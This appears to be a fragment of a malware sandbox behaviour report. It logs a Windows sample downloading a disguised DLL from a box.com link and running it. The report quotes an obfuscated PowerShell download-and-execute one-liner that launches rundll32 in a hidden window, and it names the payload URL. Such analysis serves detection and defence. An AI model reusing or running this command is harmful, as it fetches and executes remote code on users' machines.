Technical Information
- https://luanjoaquimyuri777.box.com/shared/static/bl07onsinsom4gavzak42opsj6zldtub.jpg as %temp%\qynuuuzik_user_xkxug.dll
- 'lu######uimyuri777.box.com':443
- DNS ASK lu######uimyuri777.box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-objecT SySTem.neT.webclienT).downloAdfile('""https://luanjoaquimyuri777.box.com/shared/static/bl07onsinsom4gavzak42opsj6zldtub.jpg','%TEMP%\qynuuuzik_user_xkxug.dll');START-pRoceSS RUndll3...' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\qynuuuzik_user_xkxug.dll starter